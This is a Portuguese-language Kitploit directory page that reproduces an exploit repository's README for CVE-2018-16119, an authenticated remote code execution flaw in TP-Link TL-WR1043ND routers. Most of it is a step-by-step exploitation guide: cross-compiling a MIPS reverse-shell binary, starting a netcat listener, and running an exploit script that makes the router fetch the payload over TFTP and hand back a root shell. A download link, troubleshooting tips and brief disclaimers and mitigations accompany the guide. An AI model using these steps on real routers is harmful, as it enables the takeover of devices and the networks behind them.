Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-16119 — TP-Link TL-WR1043ND - Execução Remota de Código Autenticada | Kitploit
Ferramentas/GitHubGitHub/hdbreaker/cve-2018-16119
Segurança de Sistemas EmbarcadosSegurança IoTExploraçãoExploração de Aplicações WebTestes de PenetraçãoSegurança de HardwareAprendizado e EducaçãoRed TeamingDesenvolvimento de Payloads
GitHubhdbreaker/cve-2018-16119

CVE-2018-16119

TP-Link TL-WR1043ND - Execução Remota de Código Autenticada

163há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver RepositórioSite

CVE-2018-16119: Execução Remota de Código Autenticada no TP-Link WR1043ND

Visão Geral

CVE-2018-16119 é uma vulnerabilidade crítica de execução remota de código autenticada que afeta roteadores TP-Link TL-WR1043ND. Esta vulnerabilidade permite que atacantes autenticados executem comandos arbitrários no dispositivo alvo com privilégios de root, podendo levar ao comprometimento completo do sistema.

Detalhes do CVE: CVE-2018-16119

Impacto da Vulnerabilidade

  • Vetor de Ataque: Rede
  • Complexidade do Ataque: Baixa
  • Privilégios Necessários: Baixo (Autenticação necessária)
  • Interação do Usuário: Nenhuma
  • Escopo: Alterado
  • Impacto: Comprometimento total da confidencialidade, integridade e disponibilidade do dispositivo

Uma vez explorada, um atacante obtém acesso shell root ao roteador, permitindo:

  • Modificar configurações do roteador
  • Monitorar tráfego de rede
  • Usar o dispositivo como ponto de pivô para movimento lateral
  • Instalar backdoors persistentes
  • Interromper a conectividade de rede

Dispositivos Afetados

  • TP-Link TL-WR1043ND (múltiplas versões de firmware)
  • Potencialmente outros dispositivos TP-Link que usam firmware semelhante

Pré-requisitos

Requisitos do Sistema

  • Host Linux com privilégios de root (necessário para servidor TFTP na porta 69)
  • Docker (para compilação cruzada)
  • Conectividade de rede ao dispositivo alvo
  • Credenciais de autenticação válidas para o roteador alvo

Dependências

root@kitploit:~
# Install required packages
sudo apt-get update
sudo apt-get install netcat docker.io

Guia de Exploração

Passo 1: Compilar o Payload de Reverse Shell

O exploit requer um binário MIPS big-endian de reverse shell. Siga estes passos para compilá-lo:

root@kitploit:~
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/

# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash

Dentro do contêiner Docker:

root@kitploit:~
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh

Saia do Docker e copie o binário compilado:

root@kitploit:~
cp /tmp/shh exploit/tftp_server/

Passo 2: Configurar o Listener de Reverse Shell

Abra um terminal e inicie um listener netcat na porta 9669:

Linux:

root@kitploit:~
nc -l -p 9669 -vv

macOS:

root@kitploit:~
nc -l 9669 -vv

Passo 3: Executar o Exploit

Execute o script de exploit com privilégios de root (necessário para o servidor TFTP):

root@kitploit:~
sudo python3 exploit/exploit.py

O script irá:

  1. Autenticar no roteador alvo
  2. Iniciar um servidor TFTP na porta 69
  3. Explorar a vulnerabilidade para baixar e executar o reverse shell
  4. Estabelecer uma conexão de volta ao seu listener

Passo 4: Interagir com o Shell

Uma vez que a conexão for estabelecida:

  • Você terá acesso root ao roteador
  • Nenhuma saída detalhada será exibida inicialmente
  • Basta começar a digitar comandos para interagir com o shell

Estrutura do Projeto

root@kitploit:~
CVE-2018-16119/
├── exploit/
│   ├── exploit.py              # Main exploit script
│   ├── requirements.txt        # Python dependencies
│   ├── notes.txt              # Additional notes
│   └── tftp_server/
│       ├── reverse_shell_mipsbe.c  # Reverse shell source code
│       └── shh                     # Compiled MIPS binary
├── firmware/
│   └── wr740nv4_webrevert.bin     # Sample firmware
├── squashfs-root/                  # Extracted firmware filesystem
└── README.md                       # This file

Considerações de Segurança

Divulgação Responsável

Esta vulnerabilidade foi divulgada de forma responsável e deve ser usada apenas para:

  • Testes de penetração autorizados
  • Pesquisa de segurança em ambientes controlados
  • Fins educacionais

Aviso Legal

⚠️ AVISO: Este exploit é fornecido apenas para fins educacionais e de testes autorizados. O acesso não autorizado a sistemas de computador é ilegal e antiético. Os usuários são responsáveis por garantir que tenham a devida autorização antes de usar esta ferramenta.

Recomendações de Mitigação

  • Atualize para a versão mais recente do firmware
  • Altere as credenciais administrativas padrão
  • Desative o gerenciamento remoto se não for necessário
  • Implemente segmentação de rede
  • Monitore atividades suspeitas na rede

Dependências

Instale os requisitos Python:

root@kitploit:~
pip3 install -r exploit/requirements.txt

Solução de Problemas

Problemas Comuns

Permissão Negada no Servidor TFTP:

  • Certifique-se de que o script é executado com privilégios de root
  • Verifique se a porta 69 não está em uso

Falha na Conexão:

  • Verifique a conectividade de rede com o alvo
  • Confirme se as credenciais de autenticação estão corretas
  • Verifique as configurações do firewall

Sem Resposta do Shell:

  • O shell pode levar um momento para inicializar
  • Tente pressionar Enter ou digitar comandos básicos como id ou pwd

Pesquisa e Desenvolvimento

Esta pesquisa demonstra falhas críticas de segurança no firmware de dispositivos embarcados. A vulnerabilidade destaca a importância de:

  • Práticas de codificação segura em sistemas embarcados
  • Auditorias regulares de segurança em dispositivos IoT
  • Atualizações de firmware e gerenciamento de patches em tempo hábil

Referências

  • Entrada Oficial do CVE-2018-16119
  • Comunicados de Segurança da TP-Link

Contato e Atribuição

Pesquisa por: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi


Esta pesquisa foi conduzida para fins educacionais e para melhorar a segurança de sistemas embarcados. Por favor, use com responsabilidade.

Baixar ferramenta